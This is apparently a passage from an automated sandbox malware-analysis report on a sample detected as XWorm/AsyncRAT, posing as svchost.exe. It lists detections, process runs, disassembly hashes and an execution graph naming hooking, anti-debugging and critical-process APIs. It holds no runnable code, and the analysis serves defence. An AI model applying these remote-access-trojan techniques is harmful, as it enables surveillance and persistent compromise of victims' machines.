                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:14:09:23
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                            Imagebase:0xa20000
                                                                                                                                                                                                                                            File size:42'496 bytes
                                                                                                                                                                                                                                            MD5 hash:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:14:09:32
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                            Imagebase:0x670000
                                                                                                                                                                                                                                            File size:42'496 bytes
                                                                                                                                                                                                                                            MD5 hash:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:14:10:01
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Imagebase:0xf60000
                                                                                                                                                                                                                                            File size:42'496 bytes
                                                                                                                                                                                                                                            MD5 hash:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F1117 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5a25711f126be09ae0231a2768c2df06c5b5164377e583a0a07f5d936343a8fe
                                                                                                                                                                                                                                              • Instruction ID: 651b0e9de487da320764aa9774b3cd363e0dfcd0780130017b5e253fd17132ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a25711f126be09ae0231a2768c2df06c5b5164377e583a0a07f5d936343a8fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE315461B1DA8D4FE785EB788C596B87BE1EF99301B4400BBD44DC32A3DE689C458741
                                                                                                                                                                                                                                              Function 00007FFB4B0F09F7 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3fd540ec49a93e90793bc61b4e4c8a0b9335557da11c13f79837ef96129a147d
                                                                                                                                                                                                                                              • Instruction ID: 4d6f60c674eb60b1d771be599225c9febf8a1a4adace0643b5c789491f3f0684
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fd540ec49a93e90793bc61b4e4c8a0b9335557da11c13f79837ef96129a147d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1715D70A199098FEB98EF38C598B6DB7E2EF54315F104269E15AD32E1DF78AC42C740
                                                                                                                                                                                                                                              Function 00007FFB4B0F0D80 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d1040029c6296a04b218e23c1a537e3cfba6ef73c858520d867898addfa5a49
                                                                                                                                                                                                                                              • Instruction ID: 7e822daef78bc0d3667d47b71c1362b4bad3cf37c6c938e7355ffb6bd556d4bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d1040029c6296a04b218e23c1a537e3cfba6ef73c858520d867898addfa5a49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A317A6284E3C25FC343AB708C664A17FF09E4722170E40EBD4C5CB5A3E55C699AC762
                                                                                                                                                                                                                                              Function 00007FFB4B0F0498 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 461d6d5f97fb3f3a4f6a7dc550768999569524fc969b8f1f4ff72f07351104e6
                                                                                                                                                                                                                                              • Instruction ID: e02924ad3794c2cdb5e96c6b5bdce721dd815519391d691fcb2c93c0f5a03b44
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 461d6d5f97fb3f3a4f6a7dc550768999569524fc969b8f1f4ff72f07351104e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921A171B1894D4FEB84FB7CC8996B977D2EF98301B44007AE80EC32A2DE68A8458740
                                                                                                                                                                                                                                              Function 00007FFB4B0F0E71 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 880e73231128b5220febd389b2c0912f620d9f290fdd63cda3b83de1966c4f2f
                                                                                                                                                                                                                                              • Instruction ID: 1ab92a6acbbe93913b37d2bcd0487ce5966fed8b21b7c035a715e20fcc0676e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 880e73231128b5220febd389b2c0912f620d9f290fdd63cda3b83de1966c4f2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6014970B1EA9A4FD795FB38C4555A873D2EF88314B4041B9C68AC7392EE2CF8458781
                                                                                                                                                                                                                                              Function 00007FFB4B0F04B0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 91f564d9febf7b364796236f0ca918e96d998be4077edd6fee024718e4f2cadb
                                                                                                                                                                                                                                              • Instruction ID: 8ddc110f6a919b78471d67b2462a709ba96bdaf2e225c8a721c2ade2ab91e7df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91f564d9febf7b364796236f0ca918e96d998be4077edd6fee024718e4f2cadb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DF0FF30B2DA2A4BD694FA38C444A6A73D2EB88305B504579D68FC3380EE2CA8428781
                                                                                                                                                                                                                                              Function 00007FFB4B0F04A8 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 63c493371a219232050e7369ec54e7892f0cf17786504b15a62269439afe6895
                                                                                                                                                                                                                                              • Instruction ID: b3d40d88c7193a84805305e98f983288daff8827557df242880d5b35b31ad4c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c493371a219232050e7369ec54e7892f0cf17786504b15a62269439afe6895
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CF04430B1E65A4AD254BA38D4419B973D2EF88304B104179D64EC3382EE2CB8424780
                                                                                                                                                                                                                                              Function 00007FFB4B0F0F3F Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1367211360.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb4b0f0000_sDKRz09zM7.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9455e7aab676ae2b0e4e927b1772912e5d58a704ee114c06bf20ec1400dfb57f
                                                                                                                                                                                                                                              • Instruction ID: 1e6d0f5e72be517bba8856ec399c51643c6ac95026689530cbebe477cf39789a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9455e7aab676ae2b0e4e927b1772912e5d58a704ee114c06bf20ec1400dfb57f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE02652F2C9090BE79879BCA4662B8A3C2CB88201F400039E14EC2782EC499C860240

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:23.5%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                              Signature Coverage:17.6%
                                                                                                                                                                                                                                              Total number of Nodes:17
                                                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                                                              execution_graph 4366 7ffb4b0f9798 4367 7ffb4b0f97a1 SetWindowsHookExW 4366->4367 4369 7ffb4b0f9871 4367->4369 4354 7ffb4b0f7631 4355 7ffb4b0f764f CheckRemoteDebuggerPresent 4354->4355 4357 7ffb4b0f76ef 4355->4357 4370 7ffb4b0f7740 4371 7ffb4b0f7749 4370->4371 4374 7ffb4b0f7200 4371->4374 4375 7ffb4b0f71c8 CheckRemoteDebuggerPresent 4374->4375 4377 7ffb4b0f76ef 4375->4377 4358 7ffb4b0fa46e 4359 7ffb4b0fa471 4358->4359 4361 7ffb4b0fa619 4359->4361 4362 7ffb4b0f9288 4359->4362 4363 7ffb4b0f9291 RtlSetProcessIsCritical 4362->4363 4365 7ffb4b0f9352 4363->4365 4365->4361

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F155E Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M_H
                                                                                                                                                                                                                                              • API String ID: 0-1939843538
                                                                                                                                                                                                                                              • Opcode ID: 0ee19b250c94f88c2fe0609b2f6b57bc5309321a9f8a71c7546b3c0010a43e69
                                                                                                                                                                                                                                              • Instruction ID: 52c502f8b7298ebc628817688b5693c45bf8d330f21323ca5bde553b61ae2af0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee19b250c94f88c2fe0609b2f6b57bc5309321a9f8a71c7546b3c0010a43e69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D102E4A1B2CA494BE799FF3CC455779B7D2FF98301F4441B9E44EC3296DD28A8428782
                                                                                                                                                                                                                                              Function 00007FFB4B0F7200 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 124 7ffb4b0f7200-7ffb4b0f7218 126 7ffb4b0f721a-7ffb4b0f722f 124->126 127 7ffb4b0f71c8-7ffb4b0f71cb 124->127 129 7ffb4b0f7650-7ffb4b0f76ed CheckRemoteDebuggerPresent 126->129 127->129 133 7ffb4b0f76f5-7ffb4b0f7738 129->133 134 7ffb4b0f76ef 129->134 134->133
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: af6cdf6584ce77879de3dc24959dc4120ac3f39cce169128e65be85789bc42b3
                                                                                                                                                                                                                                              • Instruction ID: c7129de9f6c1167a1dd2672ab6b58b4a60a257502d6114c03e3d40e07a0ac010
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af6cdf6584ce77879de3dc24959dc4120ac3f39cce169128e65be85789bc42b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6141577190C6888FDB55DF6CC846AF9BFE0FF66311F0441AED089D3292CA64A856C792
                                                                                                                                                                                                                                              Function 00007FFB4B0F5C76 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 355 7ffb4b0f5c76-7ffb4b0f5c83 356 7ffb4b0f5c85-7ffb4b0f5c8d 355->356 357 7ffb4b0f5c8e-7ffb4b0f5d57 355->357 356->357 361 7ffb4b0f5d59-7ffb4b0f5d62 357->361 362 7ffb4b0f5dc3 357->362 361->362 363 7ffb4b0f5d64-7ffb4b0f5d70 361->363 364 7ffb4b0f5dc5-7ffb4b0f5dea 362->364 365 7ffb4b0f5da9-7ffb4b0f5dc1 363->365 366 7ffb4b0f5d72-7ffb4b0f5d84 363->366 370 7ffb4b0f5e56 364->370 371 7ffb4b0f5dec-7ffb4b0f5df5 364->371 365->364 368 7ffb4b0f5d88-7ffb4b0f5d9b 366->368 369 7ffb4b0f5d86 366->369 368->368 372 7ffb4b0f5d9d-7ffb4b0f5da5 368->372 369->368 374 7ffb4b0f5e58-7ffb4b0f5f00 370->374 371->370 373 7ffb4b0f5df7-7ffb4b0f5e03 371->373 372->365 375 7ffb4b0f5e05-7ffb4b0f5e17 373->375 376 7ffb4b0f5e3c-7ffb4b0f5e54 373->376 385 7ffb4b0f5f02-7ffb4b0f5f0c 374->385 386 7ffb4b0f5f6e 374->386 377 7ffb4b0f5e19 375->377 378 7ffb4b0f5e1b-7ffb4b0f5e2e 375->378 376->374 377->378 378->378 380 7ffb4b0f5e30-7ffb4b0f5e38 378->380 380->376 385->386 387 7ffb4b0f5f0e-7ffb4b0f5f1b 385->387 388 7ffb4b0f5f70-7ffb4b0f5f99 386->388 389 7ffb4b0f5f54-7ffb4b0f5f6c 387->389 390 7ffb4b0f5f1d-7ffb4b0f5f2f 387->390 395 7ffb4b0f6003 388->395 396 7ffb4b0f5f9b-7ffb4b0f5fa6 388->396 389->388 391 7ffb4b0f5f33-7ffb4b0f5f46 390->391 392 7ffb4b0f5f31 390->392 391->391 394 7ffb4b0f5f48-7ffb4b0f5f50 391->394 392->391 394->389 397 7ffb4b0f6005-7ffb4b0f6096 395->397 396->395 398 7ffb4b0f5fa8-7ffb4b0f5fb6 396->398 406 7ffb4b0f609c-7ffb4b0f60ab 397->406 399 7ffb4b0f5fb8-7ffb4b0f5fca 398->399 400 7ffb4b0f5fef-7ffb4b0f6001 398->400 401 7ffb4b0f5fce-7ffb4b0f5fe1 399->401 402 7ffb4b0f5fcc 399->402 400->397 401->401 404 7ffb4b0f5fe3-7ffb4b0f5feb 401->404 402->401 404->400 407 7ffb4b0f60b3-7ffb4b0f6118 call 7ffb4b0f6134 406->407 408 7ffb4b0f60ad 406->408 415 7ffb4b0f611a 407->415 416 7ffb4b0f611f-7ffb4b0f6133 407->416 408->407 415->416
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 26426ede08f505f688054c9afce5e003648a8a9d6d755c6ad5aca1dbf0305f0c
                                                                                                                                                                                                                                              • Instruction ID: 6e053cbb341a428128a23deba487b2371ffb00ab5387b91d9b8339fd3eeacd2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26426ede08f505f688054c9afce5e003648a8a9d6d755c6ad5aca1dbf0305f0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF1B570A0CA8D8FEBA9EF28C855BE937D1FF54311F04826AE84DC7291DB74D9458B81
                                                                                                                                                                                                                                              Function 00007FFB4B0F6A22 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 417 7ffb4b0f6a22-7ffb4b0f6a2f 418 7ffb4b0f6a3a-7ffb4b0f6b07 417->418 419 7ffb4b0f6a31-7ffb4b0f6a39 417->419 423 7ffb4b0f6b09-7ffb4b0f6b12 418->423 424 7ffb4b0f6b73 418->424 419->418 423->424 426 7ffb4b0f6b14-7ffb4b0f6b20 423->426 425 7ffb4b0f6b75-7ffb4b0f6b9a 424->425 432 7ffb4b0f6c06 425->432 433 7ffb4b0f6b9c-7ffb4b0f6ba5 425->433 427 7ffb4b0f6b59-7ffb4b0f6b71 426->427 428 7ffb4b0f6b22-7ffb4b0f6b34 426->428 427->425 430 7ffb4b0f6b38-7ffb4b0f6b4b 428->430 431 7ffb4b0f6b36 428->431 430->430 434 7ffb4b0f6b4d-7ffb4b0f6b55 430->434 431->430 436 7ffb4b0f6c08-7ffb4b0f6c2d 432->436 433->432 435 7ffb4b0f6ba7-7ffb4b0f6bb3 433->435 434->427 437 7ffb4b0f6bb5-7ffb4b0f6bc7 435->437 438 7ffb4b0f6bec-7ffb4b0f6c04 435->438 443 7ffb4b0f6c2f-7ffb4b0f6c39 436->443 444 7ffb4b0f6c9b 436->444 439 7ffb4b0f6bc9 437->439 440 7ffb4b0f6bcb-7ffb4b0f6bde 437->440 438->436 439->440 440->440 442 7ffb4b0f6be0-7ffb4b0f6be8 440->442 442->438 443->444 445 7ffb4b0f6c3b-7ffb4b0f6c48 443->445 446 7ffb4b0f6c9d-7ffb4b0f6ccb 444->446 447 7ffb4b0f6c4a-7ffb4b0f6c5c 445->447 448 7ffb4b0f6c81-7ffb4b0f6c99 445->448 453 7ffb4b0f6ccd-7ffb4b0f6cd8 446->453 454 7ffb4b0f6d3b 446->454 449 7ffb4b0f6c60-7ffb4b0f6c73 447->449 450 7ffb4b0f6c5e 447->450 448->446 449->449 452 7ffb4b0f6c75-7ffb4b0f6c7d 449->452 450->449 452->448 453->454 456 7ffb4b0f6cda-7ffb4b0f6ce8 453->456 455 7ffb4b0f6d3d-7ffb4b0f6e15 454->455 466 7ffb4b0f6e1b-7ffb4b0f6e2a 455->466 457 7ffb4b0f6cea-7ffb4b0f6cfc 456->457 458 7ffb4b0f6d21-7ffb4b0f6d39 456->458 460 7ffb4b0f6d00-7ffb4b0f6d13 457->460 461 7ffb4b0f6cfe 457->461 458->455 460->460 463 7ffb4b0f6d15-7ffb4b0f6d1d 460->463 461->460 463->458 467 7ffb4b0f6e32-7ffb4b0f6e94 call 7ffb4b0f6eb0 466->467 468 7ffb4b0f6e2c 466->468 475 7ffb4b0f6e96 467->475 476 7ffb4b0f6e9b-7ffb4b0f6eaf 467->476 468->467 475->476
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c462f089be8dfd9b713b17815f1e2d24d70e29031549a6461f7e62122683d1af
                                                                                                                                                                                                                                              • Instruction ID: 5b034d1222830d27454c75ad51dae4a0da48d97349bf7504a8fb5fcceeab9c2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c462f089be8dfd9b713b17815f1e2d24d70e29031549a6461f7e62122683d1af
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE1C370A0CA4D8FEBA9EF28C855BE977D1EF58311F04826ED84DC7291DE74A941CB81
                                                                                                                                                                                                                                              Function 00007FFB4B0F1F41 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: afd05d260e52ff434e04c8676e1dfa68eee7dadd5189835840408a272e5f5cdc
                                                                                                                                                                                                                                              • Instruction ID: b94c417c173b5da568a9f9ff5b5af13156cd7f6fbc7125b4e7d5323d252558ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afd05d260e52ff434e04c8676e1dfa68eee7dadd5189835840408a272e5f5cdc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7C1A0B1B1CA094FEB99FF38C455A7977D2EF98301F0441B9E54EC33A2DE68A8428741
                                                                                                                                                                                                                                              Function 00007FFB4B0F1CA1 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f0e2bf9951a8b8b82d58506a1812f623d21d04155a21272448efc26bef23f05e
                                                                                                                                                                                                                                              • Instruction ID: 11e032da3994ea94288dbe9419103c097f42af61ddb425c9caa105c9af863237
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e2bf9951a8b8b82d58506a1812f623d21d04155a21272448efc26bef23f05e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0512290B1E6C60FD387AB7888646757FE5DF87216B0801FAE0C9C72A3DD484806C346
                                                                                                                                                                                                                                              Function 00007FFB4B0F9798 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HookWindows
                                                                                                                                                                                                                                              • String ID: I
                                                                                                                                                                                                                                              • API String ID: 2559412058-3707901625
                                                                                                                                                                                                                                              • Opcode ID: c1955d8bf54e21088d54ccfb7e34cf4c290cd1a0692783467db1a7a2b7b444e9
